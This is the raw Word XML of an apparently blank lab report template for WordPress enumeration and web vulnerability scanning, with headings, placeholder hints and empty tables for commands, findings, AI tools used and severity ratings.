              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="56996793" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRDefault="00BA0153" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2905A510" w14:textId="77777777" w:rsidR="00202FFE" w:rsidRDefault="00202FFE" w:rsidP="000947B4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E25883" w:rsidRPr="000F3EF2" w14:paraId="3F4B92E8" w14:textId="77777777" w:rsidTr="007304D9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1CF0070F" w14:textId="086CBEC3" w:rsidR="00E25883" w:rsidRPr="000F3EF2" w:rsidRDefault="00E25883" w:rsidP="008519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1.20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41596A" w:rsidRPr="0041596A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Enumerate WordPress Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17B8FDB2" w14:textId="77777777" w:rsidR="00BA0153" w:rsidRPr="00421916" w:rsidRDefault="00BA0153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A55EE1" w:rsidRPr="00411CEF" w14:paraId="034FBB78" w14:textId="77777777" w:rsidTr="0042191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81E230B" w14:textId="47622A82" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="0042191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11CEF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Target </w:t>
            </w:r>
            <w:r w:rsidR="003D10F3" w:rsidRPr="003D10F3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>WordPress Website</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77333A47" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1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55EE1" w:rsidRPr="00411CEF" w14:paraId="1164F7D3" w14:textId="77777777" w:rsidTr="00421916">
        <w:trPr>
          <w:trHeight w:val="1313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5515F1D" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="0042191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11CEF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Commands Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DBAC6AF" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1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55EE1" w:rsidRPr="00411CEF" w14:paraId="1276F8B8" w14:textId="77777777" w:rsidTr="00421916">
        <w:trPr>
          <w:trHeight w:val="1412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98421BB" w14:textId="13E767E3" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00D92A25" w:rsidP="0042191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Information Obtained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D0EF919" w14:textId="741AB8ED" w:rsidR="00A55EE1" w:rsidRPr="004B16F8" w:rsidRDefault="004B16F8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4B16F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[*Users, Themes, Plugins, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F3017" w:rsidRPr="00411CEF" w14:paraId="19D84AB0" w14:textId="77777777" w:rsidTr="00421916">
        <w:trPr>
          <w:trHeight w:val="98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9306D01" w14:textId="6C4808B3" w:rsidR="009F3017" w:rsidRPr="00411CEF" w:rsidRDefault="009F3017" w:rsidP="0042191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F3017">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Detected Misconfigurations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198837FB" w14:textId="4FCFF413" w:rsidR="009F3017" w:rsidRPr="00411CEF" w:rsidRDefault="009F3017" w:rsidP="009F3017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9F3017" w:rsidRPr="00411CEF" w14:paraId="0BD022F4" w14:textId="77777777" w:rsidTr="0042191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9B605C0" w14:textId="6EEA0018" w:rsidR="009F3017" w:rsidRPr="00411CEF" w:rsidRDefault="009F3017" w:rsidP="0042191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F3017">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerabilities Identified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162C3EE0" w14:textId="77777777" w:rsidR="009F3017" w:rsidRDefault="004B3778" w:rsidP="009F3017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4B3778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[*SQL Injection, XSS, Brute Force Risks, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F48EB57" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="009F3017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6FEDAB43" w14:textId="0194712C" w:rsidR="00841CBB" w:rsidRPr="00411CEF" w:rsidRDefault="00841CBB" w:rsidP="009F3017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A55EE1" w:rsidRPr="00411CEF" w14:paraId="074710AF" w14:textId="77777777" w:rsidTr="0042191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4519DC9" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="0042191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11CEF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2A1F0E73" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="00843567">
            <w:pPr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47A10DF" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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9E5EC3D" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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4A4C6F6" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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071AD4D" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3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41225F5" w14:textId="77777777" w:rsidR="00A55EE1" w:rsidRPr="00411CEF" w:rsidRDefault="00A55EE1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41CBB" w:rsidRPr="00411CEF" w14:paraId="7A8B4EEE" w14:textId="77777777" w:rsidTr="0042191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86AA964" w14:textId="5C9899DB" w:rsidR="00841CBB" w:rsidRPr="00411CEF" w:rsidRDefault="00841CBB" w:rsidP="0042191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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="655347D1" w14:textId="6EC7F351" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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C030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[*ShellGPT, </w:t>
            </w:r>
            <w:r w:rsidR="007362A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ChatGPT, </w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46F6F963" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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EF14FB3" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRPr="00411CEF" w:rsidRDefault="00841CBB" w:rsidP="00841CB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41CBB" w:rsidRPr="00411CEF" w14:paraId="50697E2F" w14:textId="77777777" w:rsidTr="0042191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0C42487" w14:textId="7A1AA6DD" w:rsidR="00841CBB" w:rsidRPr="00BA7B6B" w:rsidRDefault="00841CBB" w:rsidP="0042191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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B806BA9" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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8AF2A81" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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FBA12A0" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRPr="002C030C" w:rsidRDefault="00841CBB" w:rsidP="00841CB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841CBB" w:rsidRPr="00411CEF" w14:paraId="3930C620" w14:textId="77777777" w:rsidTr="0042191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B505495" w14:textId="1F2D7B6A" w:rsidR="00841CBB" w:rsidRPr="004B6A7F" w:rsidRDefault="00841CBB" w:rsidP="0042191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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EE4576B" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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F15EB39" w14:textId="77777777" w:rsidR="007362A3" w:rsidRDefault="007362A3" w:rsidP="00841CB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3BCB0DE" w14:textId="77777777" w:rsidR="007362A3" w:rsidRDefault="007362A3" w:rsidP="00841CB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8FA6969" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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3C9A0F6" w14:textId="77777777" w:rsidR="00841CBB" w:rsidRDefault="00841CBB" w:rsidP="00841CB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</w:tbl>
    <w:p w14:paraId="1CB8D668" w14:textId="77777777" w:rsidR="00A51E7D" w:rsidRPr="00A51A96" w:rsidRDefault="00A51E7D" w:rsidP="00A51E7D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lastRenderedPageBreak/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51E7D" w14:paraId="551CF701" w14:textId="77777777" w:rsidTr="00DE7224">
        <w:trPr>
          <w:trHeight w:val="2537"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A0615F1" w14:textId="77777777" w:rsidR="00A51E7D" w:rsidRDefault="00A51E7D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5684A74D" w14:textId="77777777" w:rsidR="00A51E7D" w:rsidRDefault="00A51E7D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A130C6A" w14:textId="77777777" w:rsidR="00A51E7D" w:rsidRDefault="00A51E7D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74790E8F" w14:textId="77777777" w:rsidR="00A51E7D" w:rsidRDefault="00A51E7D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6330759D" w14:textId="77777777" w:rsidR="00A51E7D" w:rsidRDefault="00A51E7D" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CA660B4" w14:textId="77777777" w:rsidR="0041596A" w:rsidRDefault="0041596A" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EEAEDF" w14:textId="0306BFD7" w:rsidR="00EF4FE4" w:rsidRDefault="00EF4FE4" w:rsidP="00EF4FE4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF4FE4">
        <w:t>Test 2: Techniques for Web Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CAFCE0" w14:textId="52A7903E" w:rsidR="004121BA" w:rsidRPr="0035345E" w:rsidRDefault="0035345E" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035345E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">[*This section </w:t>
      </w:r>
      <w:r w:rsidR="00474D64">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">includes different </w:t>
      </w:r>
      <w:r w:rsidR="003C6E8D" w:rsidRPr="003C6E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">scanning approaches, tools, and </w:t>
      </w:r>
      <w:r w:rsidR="003C6E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
      <w:r w:rsidR="003C6E8D" w:rsidRPr="003C6E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> used to identify vulnerabilities in web applications</w:t>
      </w:r>
      <w:r w:rsidR="00474D64">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0035345E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0529C0DF" w14:textId="77777777" w:rsidR="0035345E" w:rsidRDefault="0035345E" w:rsidP="000947B4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E3594D" w:rsidRPr="00A51A96" w14:paraId="76BD0330" w14:textId="77777777" w:rsidTr="007304D9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0AA85477" w14:textId="66BAD034" w:rsidR="00E3594D" w:rsidRPr="003C713F" w:rsidRDefault="00E3594D" w:rsidP="0085194C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2.1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EF4646" w:rsidRPr="00EF4646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Conduct Web Vulnerability Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72770501" w14:textId="77777777" w:rsidR="00BD5E52" w:rsidRPr="0057790A" w:rsidRDefault="00BD5E52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25"/>
        <w:gridCol w:w="2932"/>
        <w:gridCol w:w="1751"/>
        <w:gridCol w:w="1752"/>
      </w:tblGrid>
      <w:tr w:rsidR="00920DE2" w:rsidRPr="00920DE2" w14:paraId="5A537869" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F5DB5BD" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="0057790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20DE2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435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1911C8DD" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE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20DE2" w:rsidRPr="00920DE2" w14:paraId="154A50C3" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F3F41D7" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="0057790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20DE2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435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48CDABF2" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE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20DE2" w:rsidRPr="00920DE2" w14:paraId="4FC1D982" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F090741" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="0057790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20DE2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435" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78682E37" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE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20DE2" w:rsidRPr="00920DE2" w14:paraId="17EC62E9" w14:textId="77777777" w:rsidTr="0057790A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AC22EDC" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="0057790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20DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Successfully performed vulnerability scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="668C9792" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2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503" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A9F9A39" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="1BCAE420" w14:textId="77777777" w:rsidTr="00B26176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="629B5531" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE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20DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerability Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7C201CC0" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Security Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76FBFDCA" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Severity Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C441AF4" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00920DE2" w:rsidRPr="00920DE2" w14:paraId="016D0F56" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="519E5F2A" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43B5A94C" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B2C96B0" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="689D9BC0" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="2EB33A2F" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FF21003" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="145D1EA8" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="536DD09F" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36E94971" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="3A77C4B1" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2925" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CCBF784" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920D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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00920DE2">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2932" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27E33FA6" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1751" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="540D7BBA" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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1752" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24505FCB" w14:textId="77777777" w:rsidR="00920DE2" w:rsidRPr="00920DE2" w:rsidRDefault="00920DE2" w:rsidP="00920DE2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920DE2" w:rsidRPr="00920DE2" w14:paraId="2CBD38BD" w14:textId="77777777" w:rsidTr="00920DE2">
        <w:trPr>
          <w:jc w:val="center"/>
